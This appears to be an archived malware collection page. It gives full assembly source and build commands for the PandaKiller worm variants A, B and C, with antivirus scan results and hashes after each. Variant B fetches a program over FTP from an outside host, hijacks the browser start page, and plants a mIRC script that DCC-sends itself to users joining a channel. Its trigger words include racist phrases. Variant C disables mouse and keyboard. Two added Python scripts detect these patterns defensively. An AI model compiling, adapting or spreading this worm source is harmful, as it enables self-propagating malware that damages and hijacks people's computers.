nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 -
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 -

Additional information
File size: 8192 bytes
MD5...: 104229b6d583df50db044f0d89fc7db9
SHA1..: db05dc880b74d864a8c47d8db22c2847b655c14a
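The droppers above all persist through a value under HKLM\...\CurrentVersion\Run, either a dropped .vbs (sometimes with a double extension such as WSock32.dll.vbs) or rundll32 invoking user.exe,ExitWindows so the machine shuts down at every logon, and many worms in the listing propagate through a mIRC script.ini whose on-join handler DCC-sends a file. The following Python audit is an added defender-side example, not code from this archive or its author: it parses a `reg export` of the Run key and a mIRC script.ini and flags those patterns. Both inputs are constructed samples modelled on this page's values, and every function name is my own.

```python
import re

# Constructed sample of a `reg export` of the Run key, modelled on the values
# the droppers in this archive write (not a real capture).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"DwArF"="C:\\WINDOWS\\RUNDLL32.EXE C:\\Windows\\system\\User.exe,ExitWindows"
"StartWindoz"="C:\\WINDOWS\\SYSTEM\\WSock32.dll.vbs"
"killcih"="C:\\Win\\kill_cih.exe"
'''

# Constructed mIRC script.ini, modelled on the MIRC.EKP propagation script
# described in this archive (not a real capture).
SAMPLE_SCRIPT_INI = r'''[SCRIPT]
n1=on 1:start:{
n2=.remote on
n3=.events on
n4=}
n5=on 1:connect:{
n6=/.copy -o C:\Windows\WinExec.exe C:\Picture.exe
n7=/.run -n C:\command.com start C:\Win\ftp.bat
n8=}
n9=on 1:join:#:{
n10=if ( $nick == $me ) { halt }
n11=.dcc send $nick C:\Picture.exe
n12=}
'''

SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".hta")
# rundll32 ... user.exe,ExitWindows: the "shut down at every logon" payload
SHUTDOWN_RE = re.compile(r"rundll32\S*\s+\S*user\.exe\s*,\s*exitwindows", re.I)
HANDLER_RE = re.compile(r"^on\s+\S+?:(\w+):", re.I)   # on <level>:<event>:...
DCC_RE = re.compile(r"\bdcc\s+send\b", re.I)
RUN_RE = re.compile(r"(?:^|[\s/.])run\s", re.I)


def parse_reg_export(reg_text):
    """Yield (key, value_name, string_data) for REG_SZ values in a REGEDIT5 export."""
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            if data.startswith('"') and data.endswith('"'):
                # Undo the .reg escaping of backslashes and quotes.
                yield key, name.strip('"'), data[1:-1].replace("\\\\", "\\").replace('\\"', '"')


def audit_run_values(reg_text):
    """Return (value_name, reason) for Run/RunOnce values matching the page's techniques."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if not key.lower().endswith(("\\run", "\\runonce")):
            continue
        words = data.lower().split()
        target = words[0] if words else ""   # the program actually launched
        if SHUTDOWN_RE.search(data):
            findings.append((name, "rundll32 user.exe,ExitWindows: shuts the machine down at every logon"))
        if target.endswith(SCRIPT_EXT):
            findings.append((name, "script file launched from a Run key"))
            if target.rsplit("\\", 1)[-1].count(".") > 1:
                findings.append((name, "double extension hides that the file is a script"))
    return findings


def audit_mirc_script(ini_text):
    """Return (event, reason) for script.ini handlers that auto-send files or run commands."""
    findings = []
    event, depth = None, 0          # current event handler and its brace depth
    for raw in ini_text.splitlines():
        m = re.match(r"^n\d+=(.*)$", raw)
        if not m:
            continue
        body = m.group(1).strip()
        h = HANDLER_RE.match(body)
        if h and depth == 0:
            event = h.group(1).lower()
        if event:
            if DCC_RE.search(body):
                findings.append((event, "unsolicited DCC send of a file"))
            elif RUN_RE.search(body):
                findings.append((event, "runs an external command"))
            depth += body.count("{") - body.count("}")
            if depth <= 0:          # handler closed
                event, depth = None, 0
    return findings


if __name__ == "__main__":
    for name, reason in audit_run_values(SAMPLE_REG):
        print(f"Run value {name!r}: {reason}")
    for event, reason in audit_mirc_script(SAMPLE_SCRIPT_INI):
        print(f"script.ini on {event}: {reason}")
```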
comment $

W32.PandaKiller.A by PandaKiller, October 12th 2000

CREATES TWO DIRECTORIES : - C:\PandaKiller
                          - %windir%\Panda

COPIES ITSELF TO : - %windir%\Pandakiller.exe
                   - %windir%\Panda\Stages.exe
                   - %system%\Monopoly.exe

DESCRIPTION:

In C:\PandaKiller, it creates the file "EMail.txt" in which it writes an email
address where we can be contacted, as well as a copyright.
It displays a message and swaps the mouse buttons if you click
on Retry, and also changes the registered owner name to PandaKiller

TO COMPILE:

tasm32 /M /ML PandaKiller.asm
tlink32 -Tpe -x -aa PandaKiller.obj,,,import32

Link : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net

.386p
locals
jumps
.model flat

extrn CreateDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitProcess:PROC

.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
targ10 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h

rep1 db "C:\PandaKiller",00h
rep2 db "\Panda",00h
copie1 db "\PandaKiller.exe",00h
copie2 db "\Monopoly.exe",00h
copie3 db "\Panda\Stages.exe",00h
fichier db "\PandaKiller\EMail.txt",00h

TITRE db "Par PandaKiller le 12/10/00",00h
TEXTE db "****************************",10,13
db "Ce fichier n'est pas valide!",10,13
db "****************************",00h

TXT db "[PandaKiller]",0dh,0ah
db "Pour tout contact : Panda34@caramail.com",0dh,0ah
db "VBS/LoveLetter.A",0dh,0ah
db "VBS/IE55",0dh,0ah
db "W32.Happy99",0dh,0ah
db "I-Worm/Kak.A",0dh,0ah
db "W32.PandaKiller.A par PandaKiller (c)2000",00h
taille equ $-TXT

.code

DEBUT:
CREER_REPERTOIRE:
push 00000000h
push offset rep1
call CreateDirectoryA ;C:\Pandakiller
push 260
push offset targ1
call GetWindowsDirectoryA
push offset rep2
push offset targ1
call lstrcat
push offset targ1
call CreateDirectoryA ;%windir%\Panda

AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\PandaKiller.exe
push 260
push offset targ1
call GetSystemDirectoryA
push offset copie2
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%system%\Monopoly.exe

push 260
push offset targ10
call GetWindowsDirectoryA
push offset copie3
push offset targ10
call lstrcat
push 00000000h
push offset targ10
push offset targ1
call CopyFileA ;%windir%\Panda\Stages.exe

FICHIER_TEXTE:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset fichier
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push taille
push offset TXT
push [fh]
call WriteFile
push [fh]
call CloseHandle

REGISTRE:
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;IN RegisteredOwner
push p
call RegSetValueExA ;CREATE A REGISTRY VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY

MESSAGE:
push 35h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
cmp eax,4
jne FIN

SOURIS: push 01h
call SwapMouseButton
jmp MESSAGE
FIN:
push 0
call ExitProcess

end DEBUT
File W32PKa.exe received on 05.16.2009 10:40:20 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 W32/Heuristic-131!Eldorado
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 -
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 W32/Heuristic-131!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Suspicious:W32/Malware!Gemini
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 -
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Heur.Worm.Generic
McAfee 5616 2009.05.15 -
McAfee+Artemis 5616 2009.05.15 -
McAfee-GW-Edition 6.7.6 2009.05.15 -
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 -
PCTools 4.4.2.0 2009.05.15 -
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 -

Additional information
File size: 8192 bytes
MD5...: 711f77c3a07ea085bee6c1bfa884f012
SHA1..: 3cd6512c587c3b0292264177f3d538aa6e9c6965
comment $

W32.PandaKiller.B by PandaKiller, October 14th 2000

COPIES ITSELF TO : - %windir%\WinExec.exe

DESCRIPTION:
This program changes the registered owner name to PandaKiller. It copies itself
to %windir% (the WINDOWS folder) and changes the Internet start page.
It then creates three files :
- FTP.DRV : this file connects by FTP and downloads a program,
KILL_CIH.EXE (a program against CIH)
- FTP.BAT : it runs FTP.DRV
- MIRC.EKP : a script for mIRC that lets the file propagate itself.
On connection, it launches FTP.BAT and copies WINEXEC.EXE to
PICTURE.EXE. When someone joins, it sends them PICTURE.EXE
*worm* it also sends PICTURE.EXE
*KKK* : disconnects
*White Power* : shuts the program down
*hitler* : deletes Regedit.exe

TO COMPILE:

tasm32 /M /ML PandaKiller2.asm
tlink32 -Tpe -x -aa PandaKiller2.obj,,,import32

Link : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
$

.386p
locals
jumps
.model flat

extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn WinExec:PROC
extrn CreateDirectoryA:PROC
extrn ExitProcess:PROC

.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
DONNEE2 db "http://kadosh.multimania.com",00h
NOM2 db "Start Page",00h
CLE3 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE3 db "C:\Win\kill_cih.exe",00h
NOM3 db "killcih",00h
copie1 db "\WinExec.exe",00h
dossier db "C:\Win",00h
bat db "C:\Win\ftp.bat",00h
drv db "C:\Win\ftp.drv",00h
ini db "C:\Win\mirc.ekp",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h

batd db "@echo off",0dh,0ah
db "start ftp -i -v -s:C:\Win\ftp.drv",00h
batsize equ $-batd

drvd db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "cd Panda",0dh,0ah
db "binary",0dh,0ah
db "lcd C:\Win",0dh,0ah
db "get kill_cih.exe",0dh,0ah
db "bye",0dh,0ah
db "exit",0dh,0ah
drvsize equ $-drvd

inid db "[SCRIPT]",0dh,0ah
db "n1=on 1:start:{",0dh,0ah
db "n2=.remote on",0dh,0ah
db "n3=.ctcps on",0dh,0ah
db "n4=.events on",0dh,0ah
db "n5=}",0dh,0ah
db "n6=on 1:connect:{",0dh,0ah
db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah
db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah
db "n9=on 1:join:#:{",0dh,0ah
db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n11=}",0dh,0ah
db "n12=on 1:text:*worm*:{",0dh,0ah
db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n14=}",0dh,0ah
db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah
db "n16=on 1:text:*white power*:/exit",0dh,0ah
db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah
inisize equ $-inid

.code
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;INTO RegisteredOwner
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY

AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe

CREER_DOSSIER:
push 00000000h
push offset dossier
call CreateDirectoryA ;C:\Win

REGISTRE2:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000001h ;HKEY_CURRENT_USER
call RegCreateKeyExA
push 05h
push offset DONNEE2 ;kadosh.multimania.com
push 01h
push 0
push offset NOM2 ;Start Page
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE3
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE3 ;C:\Win\kill_cih.exe
push 01h
push 0
push offset NOM3 ;killcih
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY

FICHIER:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset bat
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push batsize
push offset batd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset drv
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push drvsize
push offset drvd
push [fh]
call WriteFile
push [fh]
call CloseHandle

push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset ini
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push inisize
push offset inid
push [fh]
call WriteFile
push [fh]
call CloseHandle
COPIE_MIRC:
push 00000000h
push offset script1
push offset ini
call CopyFileA
push 00000000h
push offset script2
push offset ini
call CopyFileA
push 00000000h
push offset script3
push offset ini
call CopyFileA
push 00000000h
push offset script4
push offset ini
call CopyFileA

WinExecBat:
push 1
push offset bat
call WinExec

FIN: push 0
call ExitProcess

end REGISTRE
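
The [SCRIPT] block that PandaKiller.B writes to MIRC.EKP and copies over script.ini is the whole propagation mechanism: an `on join` handler DCC-sends the dropped file to each user entering the channel, and `on text` triggers run /disconnect, /exit and /remove. The following is an added example, not code from this archive, of how a defender can parse that ini format and flag those handler shapes; the two script samples inside it are constructed for the example and the rule wording is the example's own.

```python
"""Heuristic scan of an mIRC script.ini for IRC-worm behaviour.

Added example (not part of the original archive).  mIRC stores a script as
numbered lines (n0=, n1=, ...) under a [script] section; this module
reconstructs the lines and reports commands that run from handlers fired
by other users.  Sample inputs are constructed, not taken from a real file.
"""
import re

# Constructed sample with the handler shapes the page's scripts use.
SAMPLE_SCRIPT_INI = """\
[script]
n0=on 1:start:{
n1=.remote on
n2=}
n3=on 1:join:#:{
n4=if ( $nick == $me ) { halt } | .dcc send $nick C:\\Picture.exe
n5=}
n6=on 1:text:*hello*:/disconnect
n7=on 1:text:*bye*:/remove C:\\Windows\\regedit.exe
"""

# Constructed benign script: greets joiners, sends nothing.
BENIGN_SCRIPT_INI = """\
[script]
n0=on 1:join:#:{
n1= if ( $nick != $me ) { /notice $nick Welcome to $chan }
n2=}
"""

# Events fired by other users or by the client itself, i.e. without the
# local user typing anything.
TRIGGER_EVENTS = {"start", "connect", "join", "text", "action", "notice"}

# "on <level>:<event>:..." at the start of a line opens a handler.
HANDLER_RE = re.compile(r"^on\s+\S+?:(\w+):", re.IGNORECASE)

# Commands worth reporting when they run from such a handler.  mIRC prefixes
# commands with "/" or "." (silent), and "|" separates commands on one line.
RULES = [
    (re.compile(r"(?:^|[\s/.|])dcc\s+send\b", re.I), "automatic DCC file send"),
    (re.compile(r"(?:^|[\s/|])\.?remove\s+\S", re.I), "file deletion command"),
    (re.compile(r"(?:^|[\s/|])\.?run\s+", re.I), "launches an external program"),
    (re.compile(r"(?:^|[\s/|])\.?copy\s+", re.I), "copies a file"),
    (re.compile(r"(?:^|[\s/|])\.?(?:disconnect|exit)\b", re.I),
     "disconnect/exit on remote trigger"),
]


def reconstruct_script(ini_text):
    """Return the script lines, in order, from the [script] section."""
    numbered = {}
    section = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "script":
            continue
        m = re.match(r"n(\d+)=(.*)", line)
        if m:
            numbered[int(m.group(1))] = m.group(2)
    return [numbered[k] for k in sorted(numbered)]


def scan_script(ini_text):
    """Return (event, reason, line) for every flagged command in a triggered handler."""
    findings = []
    event, depth = None, 0
    for line in reconstruct_script(ini_text):
        m = HANDLER_RE.match(line)
        if m:
            event = m.group(1).lower()
        if event in TRIGGER_EVENTS:
            for rule, reason in RULES:
                if rule.search(line):
                    findings.append((event, reason, line))
        # Track braces so a multi-line handler ends at its closing brace;
        # a single-line handler (no brace) ends on the same line.
        depth = max(0, depth + line.count("{") - line.count("}"))
        if depth == 0:
            event = None
    return findings


def is_worm_like(ini_text):
    """True when a join/text handler sends a file by DCC, the classic IRC-worm shape."""
    return any(reason == "automatic DCC file send" and event in ("join", "text")
               for event, reason, _ in scan_script(ini_text))


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SCRIPT_INI), ("benign", BENIGN_SCRIPT_INI)):
        print(label, "worm-like" if is_worm_like(text) else "clean")
        for event, reason, line in scan_script(text):
            print(f"  on {event}: {reason}: {line}")
```

The scan only reports commands inside handlers that fire without user action, so a script that DCC-sends from an alias the user types is not flagged; that is the intended trade-off, since the worm pattern is precisely the unattended send on join or on a chat trigger.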
File W32PKb.exe received on 05.16.2009 10:41:58 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 HEUR/Malware
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 Generic.Malware.SIsp!.664610C1
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Trojan.MulDrop.origin
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 -
F-Secure 8.0.14470.0 2009.05.15 W32/P2PWorm
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 Generic.Malware.SIsp!.664610C1
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Heur.StartPage
McAfee 5616 2009.05.15 New Malware.b
McAfee+Artemis 5616 2009.05.15 New Malware.b
McAfee-GW-Edition 6.7.6 2009.05.15 Heuristic.Malware
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 W32/P2PWorm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 Suspicious file
PCTools 4.4.2.0 2009.05.15 IRC.Sensi.B
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 IRC.Sensi.B

Additional information
File size: 8192 bytes
MD5...: 58c6c31028ac1b84cc73eb13300f21da
SHA1..: a73cf795bc76385b71158a64cc770a813b399b74
comment $

W32.PandaKiller.C by PandaKiller, 17 October 2000

COPIES ITSELF TO: - %windir%\WinExec.exe

DESCRIPTION: 5/12: sets the registered owner name to PandaKiller
2001: disables keyboard and mouse

TO BUILD:

tasm32 /M /ML PandaKiller3.asm
tlink32 -Tpe -x -aa PandaKiller3.obj,,,import32
$

jumps
locals
.386
.model flat

extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn GetWindowsDirectoryA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC

.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
copie db "\WinExec.exe",00h
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
CLE2 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE2 db "%windir%\WinExec.exe",00h
NOM2 db "WinExec",00h
DONNEE3 db "rundll32 mouse,disable",00h
NOM3 db "Stop1",00h
DONNEE4 db "rundll32 keyboard,disable",00h
NOM4 db "Stop2",00h
TITRE db "T.PK.3",00h
TEXTE db "VOUS SOUHAITE UNE BONNE ANNEE !",00h

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>

.code
DEBUT:
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe

push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE2 ;%windir%\WinExec.exe
push 01h
push 0
push offset NOM2
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY

HEURE: push offset SystemTime
call GetSystemTime
cmp [SystemTime.wMonth],0Ch
jne HEURE2
cmp [SystemTime.wDay],05h
jne HEURE2

REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;INTO RegisteredOwner
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY

HEURE2: push offset SystemTime
call GetSystemTime
cmp [SystemTime.wYear],7D1h
jne FIN
REGISTRE2:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE3 ;mouse,disable
push 01h
push 0
push offset NOM3
push p
call RegSetValueExA ;CREATE A VALUE
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE4 ;keyboard,disable
push 01h
push 0
push offset NOM4
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey

MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
FIN:
push 0
call ExitProcess

end DEBUT
File W32PKc.exe received on 05.16.2009 10:42:04 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 BAT/Generic
BitDefender 7.2 2009.05.16 -
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Trojan.DownLoader.origin
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 -
F-Secure 8.0.14470.0 2009.05.15 Suspicious:W32/Malware!Gemini
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 -
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 -
McAfee 5616 2009.05.15 -
McAfee+Artemis 5616 2009.05.15 -
McAfee-GW-Edition 6.7.6 2009.05.15 -
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 Suspicious file
PCTools 4.4.2.0 2009.05.15 -
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 -

Additional information
File size: 8192 bytes
MD5...: a133a8af3b031045bd0ae4c7d9fa4210
SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297
comment $
W95/98.PandaKiller by PandaKiller, 1 November 2000

TO BUILD:

tasm32 /M /ML ?????.asm
tlink32 -Tpe -x -aa ?????.obj,,,import32
$

.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn GetSystemTime:PROC

;USER32.dll
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitWindowsEx:PROC
extrn GetVersionExA:PROC

;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC

.data
szOrig db 260 dup (0)
szCopie db 260 dup (0)
szWsk1 db 260 dup (0)
szWsk2 db 260 dup (0)
szWin db 260 dup (0)
szWin2 db 260 dup (0)
fh dd 0
octets dd 0
regDisp dd 0
regResu dd 0
